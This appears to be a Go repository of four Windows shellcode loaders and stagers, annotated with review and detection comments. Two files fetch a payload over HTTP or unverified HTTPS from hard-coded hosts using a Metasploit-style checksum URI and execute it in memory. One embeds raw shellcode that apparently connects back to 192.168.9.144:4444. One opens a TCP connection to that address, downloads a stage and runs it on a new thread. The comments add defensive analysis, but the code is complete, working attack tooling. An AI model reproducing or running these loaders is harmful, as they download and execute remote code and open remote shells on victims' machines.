// Repository layout as shown on the page:
//   http/rev.go, launcher/launcher.go, meterp_stage/stager.go, https/rev.go
//
// ---- /http/rev.go ----
//
// Plain-HTTP stage fetcher: requests a checksum-matching URI from a hard-coded
// host, copies the response body into memory obtained from the w32 wrapper and
// transfers control to it. Review notes are inline; the code itself is unchanged.
package main

import (
	"fmt"
	"github.com/b00stfr3ak/w32" // referenced below as win32 — presumably the package clause in that module is `package win32`; confirm
	"io/ioutil"                 // io.ReadAll exists since Go 1.16; ioutil is deprecated but functional
	"log"
	"math/rand"
	"net/http"
	"os"
	"syscall"
	"time"
	"unsafe"
)

var (
	// Smallest URI length getURI accepts.
	uriCheckSumMin = 5
	// Alphabet for the random URI: the URL-safe base64 character set.
	base64Url = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_"
)

// randBase returns a string of `length` bytes drawn from the alphabet foo using
// math/rand seeded from the wall clock. Not cryptographic, and a new generator is
// created on every call.
func randBase(length int, foo []byte) string {
	random := rand.New(rand.NewSource(time.Now().UnixNano()))
	var outp []byte
	for i := 0; i < length; i++ {
		outp = append(outp, foo[random.Intn(len(foo))])
	}
	return string(outp)
}

// randTextBase64URL returns `length` random characters from base64Url.
func randTextBase64URL(length int) string {
	foo := []byte(base64Url)
	return randBase(length, foo)
}

// getURI draws random URIs of the given length until the sum of their bytes
// modulo 256 equals sum, then returns it prefixed with "/". The loop is unbounded
// and relies on roughly one hit per 256 attempts. When length is below
// uriCheckSumMin the process exits via log.Fatal (the message contains the typo
// "grater"; left as-is because it is a runtime string).
//
// Detection note: a request path whose byte sum mod 256 equals a fixed value is
// a cheap property to check on proxy/IDS logs; main uses sum 92, which presumably
// matches the msf-style reverse_http checksum scheme — confirm against that reference.
func getURI(sum, length int) string {
	if length < uriCheckSumMin {
		log.Fatal("Length must be ", uriCheckSumMin, " bytes or grater")
	}
	for {
		checksum8 := 0
		uri := randTextBase64URL(length)
		for _, value := range []byte(uri) {
			checksum8 += int(value)
		}
		if checksum8%0x100 == sum {
			return "/" + uri
		}
	}
}

// main fetches the payload over cleartext HTTP and executes it in memory.
//
// Review notes (observed behaviour, not changed here):
//   - http.Get uses the default client: no timeout, so a stalled server hangs the process.
//   - win32.VirtualAlloc receives only a size; the protection flags are set inside the
//     w32 wrapper and are not visible here — presumably executable, confirm there.
//   - The (*[890000]byte) view is a fixed-size cast over an allocation of len(payload)
//     bytes; a longer payload panics on the bounds check, and go vet flags the
//     uintptr -> unsafe.Pointer conversion.
//   - syscall.Syscall(addr, 0, 0, 0, 0) invokes addr as a zero-argument procedure on
//     the current thread; the call never returns to main unless the payload does.
//
// Detection note: the observable sequence is an outbound GET to 192.168.9.225:8080
// followed by VirtualAlloc, a write of the response body into that region, and a
// transfer of control to it.
func main() {
	hostAndPort := "http://192.168.9.225:8080"
	response, err := http.Get(hostAndPort + getURI(92, 128))
	if err != nil {
		log.Fatal(err)
	}
	defer response.Body.Close()
	payload, err := ioutil.ReadAll(response.Body)
	if err != nil {
		log.Fatal(err)
	}
	addr, err := win32.VirtualAlloc(uintptr(len(payload)))
	if err != nil {
		fmt.Println(err)
		os.Exit(1)
	}
	fmt.Println("Payload length ", len(payload))
	// Fixed-size array view; only len(payload) bytes were actually allocated.
	b := (*[890000]byte)(unsafe.Pointer(addr))
	for x, value := range payload {
		b[x] = value
	}
	syscall.Syscall(addr, 0, 0, 0, 0)
}
// ---- /launcher/launcher.go ----
//
// Embedded-shellcode launcher: copies a byte string into memory from the w32
// VirtualAlloc wrapper and runs it on a new thread. Review notes are inline; the
// code itself is unchanged.
package main

import (
	"fmt"
	"os"
	"unsafe"

	"github.com/b00stfr3ak/w32" // referenced below as win32 — presumably `package win32` in that module; confirm
)

// ./msfvenom -p windows/exec cmd=calc.exe -f c | tr -d "\"\n"
//
// NOTE(review): the generator comment above may be stale. The blob below contains
// the byte sequences c0 a8 09 90 and 11 5c, i.e. the same 192.168.9.144:4444
// endpoint that stager.go connects to, which does not look like a windows/exec
// payload — verify which payload this actually is before relying on the comment.
// The literal also ends in ";" inside the quotes, so one extra 0x3B byte trails
// the final \xc3.

var shellcode string = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xc0\xa8\x09\x90\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x75\xee\xc3;"

// main allocates len(shellcode) bytes through the w32 wrapper, copies the blob in,
// and starts a thread at that address.
//
// Review notes (observed, not changed):
//   - The (*[80000]byte) cast is a fixed-size view over a much smaller allocation;
//     writes stay within len(shellcode) here, and go vet flags the conversion.
//   - Protection flags are chosen inside win32.VirtualAlloc and are not visible here.
//   - The CreateThread return value is not checked before WaitForSingleObject.
//   - The wait timeout is 0xFFFFFFF (seven F's), about 74.5 hours in milliseconds,
//     not the INFINITE constant 0xFFFFFFFF — probably a typo.
//
// Detection note: VirtualAlloc, a write into the region, and CreateThread with a
// start address inside that region is the sequence an EDR would see.
func main() {
	addr, err := win32.VirtualAlloc(uintptr(len(shellcode)))
	if err != nil {
		fmt.Println(err)
		os.Exit(1)
	}
	b := (*[80000]byte)(unsafe.Pointer(addr))
	for x, value := range []byte(shellcode) {
		b[x] = value
	}
	//syscall.Syscall(addr, 0, 0, 0, 0)
	var threadID uint = 0
	hand := win32.CreateThread(0, 0, unsafe.Pointer(addr),
		0, 0, &threadID)
	println("created thread")
	// 0xFFFFFFF is a finite timeout, see note above.
	win32.WaitForSingleObject(hand, 0xFFFFFFF)
}

// ---- /meterp_stage/stager.go ----
//
// TCP stager: connects to a hard-coded address, reads a 4-byte little-endian
// length followed by that many bytes, prefixes the buffer with a 5-byte header
// carrying the socket handle, and runs it on a new thread. Review notes are
// inline; the code itself is unchanged.
package main

import (
	"encoding/binary"
	"fmt"
	"github.com/b00stfr3ak/w32" // referenced below as win32 — presumably `package win32` in that module; confirm
	"log"
	"syscall"
	"unsafe"
)

// main performs the connect / receive / execute sequence described above.
//
// Review notes (observed, not changed):
//   - WSAStartup, Socket (fd, _), Connect and both WSARecv calls have their errors
//     ignored; "Connected to server" is printed whether or not Connect succeeded.
//   - The 4-byte length read assumes a single WSARecv delivers all four bytes;
//     qty is never checked.
//   - scLength comes from the peer with no upper bound and sizes make([]byte, ...);
//     a zero length makes &sc[0] panic on an empty slice.
//   - In the receive loop dataBuf.Buf always points at &sc[0], so each WSARecv
//     writes at the start of sc and the first qty2 bytes are appended to sc2; the
//     reassembly is therefore correct, but if the peer closes early qty2 stays 0
//     and the loop never terminates.
//   - The 5-byte prefix is 0xBF followed by a 32-bit immediate — presumably a
//     `mov edi, imm32` handing the socket to the stage. Only the low byte of the
//     handle (byte(m)) is written; bytes 2..4 are hard-coded zero, so any handle
//     value above 255 is truncated. The handle is also round-tripped through
//     unsafe.Pointer, which go vet flags.
//   - The (*[800000]byte) view is a fixed-size cast over scLength+5 bytes; a larger
//     stage panics on the bounds check.
//   - CreateThread's result is not checked, and the wait timeout 0xFFFFFFF is
//     about 74.5 hours rather than INFINITE (0xFFFFFFFF).
//
// Detection note: outbound TCP to 192.168.9.144:4444, a length-prefixed download,
// VirtualAlloc, and CreateThread into the new region is the observable sequence.
func main() {
	var d syscall.WSAData
	syscall.WSAStartup(uint32(0x202), &d)
	fd, _ := syscall.Socket(syscall.AF_INET, syscall.SOCK_STREAM, 0)
	addr := syscall.SockaddrInet4{Port: 4444, Addr: [4]byte{192, 168, 9, 144}}
	syscall.Connect(fd, &addr)
	fmt.Println("Connected to server")
	// Length prefix: 4 bytes, little-endian.
	var buf [4]byte
	dataBuf := syscall.WSABuf{Len: uint32(4), Buf: &buf[0]}
	flags := uint32(0)
	qty := uint32(0)
	syscall.WSARecv(fd, &dataBuf, 1, &qty, &flags, nil, nil)
	scLength := binary.LittleEndian.Uint32(buf[:])
	fmt.Println("shellcode length is ", scLength)
	sc := make([]byte, scLength)
	var sc2 []byte
	// sc is reused as the receive scratch buffer; sc2 accumulates the stream.
	dataBuf = syscall.WSABuf{Len: scLength, Buf: &sc[0]}
	flags2 := uint32(0)
	qty2 := uint32(0)
	total := uint32(0)
	for total < scLength {
		syscall.WSARecv(fd, &dataBuf, 1, &qty2, &flags2, nil, nil)
		for i := 0; i < int(qty2); i++ {
			sc2 = append(sc2, sc[i])
		}
		total += qty2
	}
	// +5 for the handle-carrying prefix written below.
	mem, err := win32.VirtualAlloc(uintptr(scLength + 5))
	if err != nil {
		log.Fatalf("Can't create buffer %s", err)
	}
	fmt.Println("Created buffer")
	b := (*[800000]byte)(unsafe.Pointer(mem))
	fmt.Println("Created byte array to virtualalloc")
	m := (uintptr)(unsafe.Pointer(fd))
	// Prefix: 0xBF + 32-bit immediate; only the low byte of the handle is populated.
	b[0] = 0xBF
	b[1] = byte(m)
	b[2] = 0x00
	b[3] = 0x00
	b[4] = 0x00
	for x, s := range sc2 {
		b[x+5] = s
	}
	fmt.Println("wrote shellcode to buffer")
	//syscall.Syscall(mem, 0, 0, 0, 0)
	var threadID uint = 0
	hand := win32.CreateThread(0, 0, unsafe.Pointer(mem),
		0, 0, &threadID)
	println("created thread")
	// 0xFFFFFFF is a finite timeout, see note above.
	win32.WaitForSingleObject(hand, 0xFFFFFFF)
}

// ---- /https/rev.go ----
//
// HTTPS variant of http/rev.go: identical URI generation and in-memory execution,
// but the request goes through a Transport with certificate verification
// disabled. Review notes are inline; the code itself is unchanged.
package main

import (
	"crypto/tls"
	"fmt"
	"github.com/b00stfr3ak/w32" // referenced below as win32 — presumably `package win32` in that module; confirm
	"io/ioutil"                 // io.ReadAll exists since Go 1.16; ioutil is deprecated but functional
	"log"
	"math/rand"
	"net/http"
	"os"
	"syscall"
	"time"
	"unsafe"
)

var (
	// Smallest URI length getURI accepts.
	uriCheckSumMin = 5
	// Alphabet for the random URI: the URL-safe base64 character set.
	base64Url = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_"
)

// randBase returns a string of `length` bytes drawn from the alphabet foo using
// math/rand seeded from the wall clock. Not cryptographic, and a new generator is
// created on every call.
func randBase(length int, foo []byte) string {
	random := rand.New(rand.NewSource(time.Now().UnixNano()))
	var outp []byte
	for i := 0; i < length; i++ {
		outp = append(outp, foo[random.Intn(len(foo))])
	}
	return string(outp)
}

// randTextBase64URL returns `length` random characters from base64Url.
func randTextBase64URL(length int) string {
	foo := []byte(base64Url)
	return randBase(length, foo)
}

// getURI draws random URIs of the given length until the sum of their bytes
// modulo 256 equals sum, then returns it prefixed with "/". The loop is unbounded
// and relies on roughly one hit per 256 attempts. When length is below
// uriCheckSumMin the process exits via log.Fatal (the message contains the typo
// "grater"; left as-is because it is a runtime string).
//
// Detection note: as in http/rev.go, the fixed byte-sum property of the path
// (sum 92 here) is a checkable network signature; the sum presumably matches the
// msf-style reverse_http checksum scheme — confirm against that reference.
func getURI(sum, length int) string {
	if length < uriCheckSumMin {
		log.Fatal("Length must be ", uriCheckSumMin, " bytes or grater")
	}
	for {
		checksum8 := 0
		uri := randTextBase64URL(length)
		for _, value := range []byte(uri) {
			checksum8 += int(value)
		}
		if checksum8%0x100 == sum {
			return "/" + uri
		}
	}
}

// main fetches the payload over TLS with verification disabled and executes it
// in memory.
//
// Review notes (observed, not changed):
//   - InsecureSkipVerify: true means the server certificate is never checked, so
//     the transport provides confidentiality only, no authenticity for the fetched
//     bytes; the client also has no timeout.
//   - URI length is 20 here versus 128 in http/rev.go; both satisfy uriCheckSumMin.
//   - Same fixed-size (*[890000]byte) view and go vet-flagged pointer conversion
//     as http/rev.go; a payload longer than the array panics.
//   - syscall.Syscall(addr, 0, 0, 0, 0) invokes addr as a zero-argument procedure
//     on the current thread.
//
// Detection note: a TLS session to 192.168.9.225:8443 that is never validated,
// followed by VirtualAlloc, a write of the body, and a control transfer into it.
func main() {
	tr := &http.Transport{
		TLSClientConfig: &tls.Config{InsecureSkipVerify: true}} // certificate validation disabled
	client := http.Client{Transport: tr}
	hostAndPort := "https://192.168.9.225:8443"
	response, err := client.Get(hostAndPort + getURI(92, 20))
	if err != nil {
		log.Fatal(err)
	}
	defer response.Body.Close()
	payload, err := ioutil.ReadAll(response.Body)
	if err != nil {
		log.Fatal(err)
	}
	addr, err := win32.VirtualAlloc(uintptr(len(payload)))
	if err != nil {
		fmt.Println(err)
		os.Exit(1)
	}
	fmt.Println("Payload length ", len(payload))
	// Fixed-size array view; only len(payload) bytes were actually allocated.
	b := (*[890000]byte)(unsafe.Pointer(addr))
	for x, value := range payload {
		b[x] = value
	}
	syscall.Syscall(addr, 0, 0, 0, 0)
}